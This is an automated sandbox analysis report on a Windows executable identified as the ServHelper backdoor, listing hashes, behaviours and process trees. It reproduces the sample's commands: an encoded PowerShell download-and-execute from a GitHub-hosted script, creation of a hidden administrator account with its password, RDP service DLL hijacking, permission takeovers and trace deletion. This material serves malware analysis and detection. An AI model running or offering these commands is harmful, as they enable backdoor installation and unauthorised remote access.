Analysis
-
max time kernel
139s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
15-07-2024 05:02
Static task
static1
Behavioral task
behavioral1
Sample
4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe
-
Size
5.7MB
-
MD5
4854d8c74fcf1aeb5138075a5b029f91
-
SHA1
375a02de564add94066335e4daa8e7233f0b4c05
-
SHA256
1826d874e7b2798a9c7e12af91f4ab3466c798ca7c26b6a1ac76bbdfc221cb1f
-
SHA512
1e47dd787053bf2963b8760d93daffbe9f285f8d60a6264ca6f90cd9dad5701cdc4f8c44461dcc15105b9b8a23cdc83dea985df7611e3a9451a4c4cce41c959a
-
SSDEEP
49152:UsAnsrrb/T/vO90dL3BmAFd4A64nsfJ13Dd95+bC+dTfixrrAq/n55SyZuKnyed7:UsPQzdtmAQQQQQQQQQQQQQ
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2612 powershell.exe 6 2612 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2032 icacls.exe 1288 icacls.exe 1108 icacls.exe 2800 takeown.exe 2944 icacls.exe 2808 icacls.exe 2376 icacls.exe 1940 icacls.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 1408 1408 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1288 icacls.exe 1108 icacls.exe 2800 takeown.exe 2944 icacls.exe 2808 icacls.exe 2376 icacls.exe 1940 icacls.exe 2032 icacls.exe -
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 4 raw.githubusercontent.com 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 9 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BFXFG9P4LI6AKU3V6W1R.temp powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 2612 powershell.exe 1452 powershell.exe 2572 powershell.exe 2712 powershell.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 4 IoCs
Processes:
WMIC.exeWMIC.exepowershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 3091264674d6da01 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2212 powershell.exe 1452 powershell.exe 2572 powershell.exe 2712 powershell.exe 2212 powershell.exe 2212 powershell.exe 2212 powershell.exe 2612 powershell.exe -
Suspicious behavior: LoadsDriver 6 IoCs
Processes:
pid process 472 1408 1408 1408 1408 1408 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 1452 powershell.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 2712 powershell.exe Token: SeRestorePrivilege 2808 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1996 WMIC.exe Token: SeIncreaseQuotaPrivilege 1996 WMIC.exe Token: SeAuditPrivilege 1996 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1996 WMIC.exe Token: SeIncreaseQuotaPrivilege 1996 WMIC.exe Token: SeAuditPrivilege 1996 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2892 WMIC.exe Token: SeIncreaseQuotaPrivilege 2892 WMIC.exe Token: SeAuditPrivilege 2892 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2892 WMIC.exe Token: SeIncreaseQuotaPrivilege 2892 WMIC.exe Token: SeAuditPrivilege 2892 WMIC.exe Token: SeDebugPrivilege 2612 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 2812 wrote to memory of 2212 2812 4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe powershell.exe PID 2812 wrote to memory of 2212 2812 4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe powershell.exe PID 2812 wrote to memory of 2212 2812 4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe powershell.exe PID 2212 wrote to memory of 1304 2212 powershell.exe csc.exe PID 2212 wrote to memory of 1304 2212 powershell.exe csc.exe PID 2212 wrote to memory of 1304 2212 powershell.exe csc.exe PID 1304 wrote to memory of 2676 1304 csc.exe cvtres.exe PID 1304 wrote to memory of 2676 1304 csc.exe cvtres.exe PID 1304 wrote to memory of 2676 1304 csc.exe cvtres.exe PID 2212 wrote to memory of 1452 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 1452 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 1452 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 2572 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 2572 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 2572 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 2712 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 2712 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 2712 2212 powershell.exe powershell.exe PID 2212 wrote to memory of 2800 2212 powershell.exe takeown.exe PID 2212 wrote to memory of 2800 2212 powershell.exe takeown.exe PID 2212 wrote to memory of 2800 2212 powershell.exe takeown.exe PID 2212 wrote to memory of 2944 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2944 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2944 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2808 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2808 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2808 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2376 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2376 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2376 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1940 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1940 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1940 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2032 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2032 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 2032 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1288 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1288 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1288 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1108 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1108 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1108 2212 powershell.exe icacls.exe PID 2212 wrote to memory of 1448 2212 powershell.exe reg.exe PID 2212 wrote to memory of 1448 2212 powershell.exe reg.exe PID 2212 wrote to memory of 1448 2212 powershell.exe reg.exe PID 2212 wrote to memory of 296 2212 powershell.exe reg.exe PID 2212 wrote to memory of 296 2212 powershell.exe reg.exe PID 2212 wrote to memory of 296 2212 powershell.exe reg.exe PID 2212 wrote to memory of 2584 2212 powershell.exe reg.exe PID 2212 wrote to memory of 2584 2212 powershell.exe reg.exe PID 2212 wrote to memory of 2584 2212 powershell.exe reg.exe PID 2212 wrote to memory of 1660 2212 powershell.exe net.exe PID 2212 wrote to memory of 1660 2212 powershell.exe net.exe PID 2212 wrote to memory of 1660 2212 powershell.exe net.exe PID 1660 wrote to memory of 1640 1660 net.exe net1.exe PID 1660 wrote to memory of 1640 1660 net.exe net1.exe PID 1660 wrote to memory of 1640 1660 net.exe net1.exe PID 2212 wrote to memory of 2460 2212 powershell.exe cmd.exe PID 2212 wrote to memory of 2460 2212 powershell.exe cmd.exe PID 2212 wrote to memory of 2460 2212 powershell.exe cmd.exe PID 2460 wrote to memory of 2440 2460 cmd.exe cmd.exe PID 2460 wrote to memory of 2440 2460 cmd.exe cmd.exe PID 2460 wrote to memory of 2440 2460 cmd.exe cmd.exe PID 2440 wrote to memory of 2204 2440 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\4854d8c74fcf1aeb5138075a5b029f91_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c1jbeaka.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E72.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9E71.tmp"4⤵PID:2676
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2800
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2944
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2376
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1940
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2032
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1288
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1108
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1448
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Server Software Component: Terminal Services DLL
- Modifies registry key
PID:296
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2584
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1640
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2440 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:2204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2436
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2476
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1016
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2932
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2148
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2368
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:440
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:3056
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc DZS9GAvk /add1⤵PID:1340
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc DZS9GAvk /add2⤵PID:1784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc DZS9GAvk /add3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2156
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:640
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" FMEDFXFE$ /ADD1⤵PID:568
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" FMEDFXFE$ /ADD2⤵PID:1944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FMEDFXFE$ /ADD3⤵PID:2400
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:2404
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:3024
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1952
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc DZS9GAvk1⤵PID:1872
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc DZS9GAvk2⤵PID:2056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc DZS9GAvk3⤵PID:972
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1036
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1576
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:2964
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2664
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a115bb5ebd68f736977ce77f6ec21692
SHA140a386bc55d088a3771eb110393afedf4f77330c
SHA25677a94437be70483cfaa79241e0df2518b2d7af9a1471b757ae942e95f9271086
SHA51275735f525ddc44488bcc7d1855d89dd7cbc31472c493d0b0e6602b2a94bf5ee0b6018713b3256883f08b9b82cd3d5c539cb8a9793be62574bc4ee28448197814
-
Filesize
3KB
MD52808fac1e53957df50a11289c5cbba8c
SHA14a50dbc016f5583fbff8c2314e951a86707a9707
SHA256d68e75e2c6ef49aa6aa4ba9b7a8ae3e161afc75ca04ce8b4e7c0e08935100e3c
SHA51293e56e9b9286f4cd6a49eaa102be09f5249990bf6e8e94018fba6423e3792513d454351d80a11ca7b02c3096ae5a7f4d1cf7f2406c5e2b0791496c22d6403b79
-
Filesize
7KB
MD55dda9b91c3fe842b197703c6008dd817
SHA19bb88b22365498ff109f43acaf17eec6ed073e1c
SHA2561d89660d857065784c8a2aa52b1e066b0119e13554f7c9453228892f21fe0457
SHA51256875526cee7de993a10e98a9e5b10373289d2ec56b0599b07b9bb29100d57cc88cd5fb4dc8ab6302f5a9edb3df50015d11c9b73b7f0d1753d5f1b4915396ea9
-
Filesize
2.5MB
MD5f49b7639c86923a9507b594feb5df523
SHA1e3a058aa2ae06ee0d8e1c3d47d790181651744a1
SHA256f92f29a5e41c25e32ad83a71e9e2a54c87f91c966cb90fdd3b1289bad824b021
SHA512c68858888ea64affa95b3e51e3d3ef43d12e8628f5a09fdb5f33319f1cb5a23df9506a2dfb797445f77cf7120e79f9d0c9ddd25a567dab81cce0c3751903c804
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XR8HR9CZWW5G4CU5PNOI.temp
Filesize7KB
MD5b6634d241dac594590d6d56f72bdb8d9
SHA1807be2ffa7f2a0f572f975f7bb6d97b48a6c395c
SHA256d49416525d32376bbcbad79f2028ed909fd683b88cae9d2323f477100a668c08
SHA5121edff30761ba554a446a0d98c8b94e1af932f3dc602c7cc9498b2d5c012479a80a6dbbd088bcde64b9914b86f052690e91352847372643d875d437a0d5bbafa7
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5420ae49bf756bf0de65963ee31df5fe6
SHA100de2e178506bf68d5cf31fb9b41253eaffe3070
SHA256b2060590f0b7323ab4186cc92e05d93154ba69face754c2c721356f013bdc929
SHA51252b8c9490e071b5ba51dd4e808fe3cf3b4f7b344d7a2d7a0c6e9733f6b8c4de53dfa3ce0bcde98b7e00dd1602e2ea223d9050815917deb81a3be7489e2a52959
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD52de720c6e23e6a8545e938d69f22f29c
SHA199f3cdb7692edde6bc0cf75871656d56a8794ac7
SHA256b9dcf8994040416b10ef9b85558785b0609eddce31e538b52ff5633744e21c09
SHA512b507ee5d48be1c8e48c9d76d2411eda9314096b8423ad02ffc07b233b7168d2b58ff0a59c3c07c1972c38786e93093d0a19dd92555ade13fb66c10e0637bc275
-
Filesize
60KB
MD55410b592605e57a4a01c66b0a1f0d10d
SHA1afa4acf032d537dd46e997891fc7f9bba9555679
SHA256e39445c5f61c431be3b0ce753487e9a6439b5bfb813cf21116b77fb7d0696fa9
SHA5124ce9816c61e58834c1713d0abcf6305d565b7a52c1d2d2f63d8b7c5b69314d959205ea70af084ef74759820114c8b938800513e0dda43d699f0454189b5fbdca
-
Filesize
743KB
MD537b7b51385d6b857d082976c035c86e0
SHA1c2ec7d74e7d555375cdcca0407237dd3e7db2a24
SHA256a66a31069c3d37207c33b0dc1a9a0d1bbe85a0dd78168f598edfebe07c3d4e22
SHA5128bc897adf02406478a4bc6a24efcfcd699e2fa7aa7e82c8bd6d05f6b5922143866039d533ae8730dbd0d76c7745cbda86d4c4174a298bf29be1a80c7a1eaf403